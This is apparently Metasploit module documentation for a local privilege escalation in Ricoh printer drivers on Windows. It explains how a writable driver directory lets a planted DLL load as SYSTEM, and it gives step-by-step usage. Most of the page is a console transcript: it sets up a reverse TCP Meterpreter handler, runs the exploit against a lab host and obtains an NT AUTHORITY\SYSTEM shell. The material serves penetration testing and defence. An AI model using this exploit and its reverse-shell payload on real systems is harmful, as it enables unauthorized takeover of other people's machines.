## Vulnerable Application

  [Various Ricoh printer drivers](https://www.ricoh.com/info/2020/0122_1/list) allow escalation of
  privileges on Windows systems.

  For vulnerable drivers, a low-privileged user can
  read/write files within the `RICOH_DRV` directory
  and its subdirectories.

  `PrintIsolationHost.exe`, a Windows process running
  as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
  during the installation of a printer. A user can
  elevate to SYSTEM by writing a malicious DLL to
  the vulnerable driver directory and adding a new
  printer with a vulnerable driver.

  Multiple runs of this module may be required
  given successful exploitation is time-sensitive.

## Verification Steps

  1. Install a vulnerable Ricoh driver
  2. Start msfconsole
  3. Get a session with basic privileges
  4. Do: ```use exploit/windows/local/ricoh_driver_privesc```
  5. Do: ```set SESSION <sess_no>```
  6. Do: ```run```
  7. You should get a shell running as SYSTEM.

## Scenarios

### Tested on Ricoh PCL6 Universal Driver `v4.13`

  ```
  msf > use multi/handler
  msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
  payload => windows/x64/meterpreter/reverse_tcp
  msf exploit(multi/handler) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444
  [*] Sending stage (206403 bytes) to 192.168.37.199
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.199:49670) at 2020-02-06 12:47:59 -0600

  meterpreter > getuid
  Server username: DESKTOP-A97LIDN\ricoh-test
  meterpreter > sysinfo
  Computer        : DESKTOP-A97LIDN
  OS              : Windows 10 (10.0 Build 16299).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x64/windows
  meterpreter > background
  [*] Backgrounding session 1...
  msf exploit(multi/handler) > use ricoh_driver_privesc

  Matching Modules
  ================

     #  Name                                        Disclosure Date  Rank    Check  Description
     -  ----                                        ---------------  ----    -----  -----------
     0  exploit/windows/local/ricoh_driver_privesc  2020-01-22       normal  Yes    Ricoh Driver Privilege Escalation


  [*] Using exploit/windows/local/ricoh_driver_privesc
  msf exploit(windows/local/ricoh_driver_privesc) > set session 1
  session => 1
  msf exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
  payload => windows/x64/meterpreter/reverse_tcp
  msf exploit(windows/local/ricoh_driver_privesc) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf exploit(windows/local/ricoh_driver_privesc) > check
  [*] The target appears to be vulnerable. Ricoh driver directory has full permissions
  msf exploit(windows/local/ricoh_driver_privesc) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444
  [*] Adding printer JLFJCi...
  [*] Sending stage (206403 bytes) to 192.168.37.199
  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.199:49673) at 2020-02-06 12:48:40 -0600
  [*] Deleting printer JLFJCi
  [+] Deleted C:\Users\RICOH-~1\AppData\Local\Temp\GFHCkvh.bat
  [+] Deleted C:\Users\RICOH-~1\AppData\Local\Temp\headerfooter.dll

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > sysinfo
  Computer        : DESKTOP-A97LIDN
  OS              : Windows 10 (10.0 Build 16299).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x64/windows
  ```
